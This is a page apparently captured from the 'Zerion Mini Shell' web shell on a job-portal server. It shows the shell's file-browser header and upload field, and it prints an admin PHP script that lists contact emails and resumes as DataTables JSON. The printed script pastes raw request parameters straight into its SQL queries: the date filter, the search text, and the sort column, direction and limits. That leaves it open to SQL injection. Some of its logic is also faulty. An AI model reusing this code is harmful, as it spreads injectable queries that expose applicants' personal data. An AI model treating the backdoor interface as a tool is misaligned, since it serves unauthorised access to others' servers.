ok

Mini Shell

Direktori : /home2/selectio/www/y1jobportal.in/admin/data-tables/
Upload File :
Current File : //home2/selectio/www/y1jobportal.in/admin/data-tables/email-dt.php

<?php
include("../api/config/config.php");
$requestData= $_REQUEST;
$condition='';
if(isset($_POST['date'])){
    $condition.=" and date between '".$_POST['date']."' and '".$_POST['date']."' ";
}


/*Fetch Database column Details*/
        $columns = array( 
            0 =>'id',
            1 =>'id',
            2 =>'firstname',
            3 =>'mobile',
            4 =>'email',
            5 =>'password',
            6 =>'city',
            7 =>'address',
        );
        
/*Fetch All Data Start*/        
    	$statement = $pdo->prepare("SELECT * FROM tbl_mail ORDER BY id DESC");
		$statement->execute();
		$query = $statement->fetchAll(PDO::FETCH_ASSOC);
		$totalData = $statement->rowCount();
/*Fetch All Data End*/       
        
/*Fetch Filter Data Start*/    
          $sql="SELECT * FROM tbl_mail where 1=1 $condition";
         
        if( !empty($requestData['search']['value']) ) 
        {   
        	$sql.=" AND ( id LIKE '%".$requestData['search']['value']."%' ";    
        	$sql.=" OR email LIKE '%".$requestData['search']['value']."%' ";    
        	$sql.=" OR form_type LIKE '%".$requestData['search']['value']."%' ";
        	$sql.=" OR name LIKE '%".$requestData['search']['value']."%' ) ";
        	}
        	 
        $statement = $pdo->prepare($sql);
        $statement->execute();
		$query = $statement->fetchAll(PDO::FETCH_ASSOC);
        $totalFiltered = $statement->rowCount();
        
/*Fetch Filter Data End*/       

        $sql.=" ORDER BY ". $columns[$requestData['order'][0]['column']]."   ".$requestData['order'][0]['dir']."  LIMIT ".$requestData['start']." ,".$requestData['length']."   ";
        $statement = $pdo->prepare($sql);
        $statement->execute();
		$query = $statement->fetchAll(PDO::FETCH_ASSOC);

$data = array();
$i=$requestData['start']+1;
foreach($query as $row ) {  // preparing an array
	$nestedData=array(); 
	
		$action= "<div class='text-center'><div class='btn-group'>";

	              
	                $action.=" <button style='padding: 0px 0px 0px 5px; height: 30px; margin-right: 3px;' title='Delete Email Details' onClick='delete_email(".$row["id"].")' class='tip btn btn-danger btn-xs'>
	                    <i class='bi bi-trash3'></i>
	                </button>";
	                
	 	$action.="</div></div>";

$resume = $row['cv_file'];
    if(isset($row['status'])=="1"){$status="<span class='span-success'> Active </span>";	} else{$status="<span class='span-danger'> In-Active </span>";}
    if(isset($row['cv_file'])=="1"){$cv_file="<a target='_blank' href='$resume' class='span-success'> View Resume </a>";	} 

	 

	
    $nestedData[] = $action;
    $nestedData[] = $i;
    $nestedData[] = $row['name'];
    $nestedData[] = $row['mobile_no'];
    $nestedData[] = $row['email'];
    $nestedData[] = $row['subject'];
    $nestedData[] = $row['form_type'];
    $nestedData[] = $row['job_type'];
    $nestedData[] = $status;
    $nestedData[] = $cv_file;
	$data[] = $nestedData;
	$i++;
}

$json_data = array(
			"draw"            => intval( $requestData['draw'] ),   // for every request/draw by clientside , they send a number as a parameter, when they recieve a response/data they first check the draw number, so we are sending same number in draw. 
			"recordsTotal"    => intval( $totalData ),  // total number of records
			"recordsFiltered" => intval( $totalFiltered ), // total number of records after searching, if there is no searching then totalFiltered = totalData
			"data"            => $data   // total data array
			);

echo json_encode($json_data);  // send data as json format

?>

Zerion Mini Shell 1.0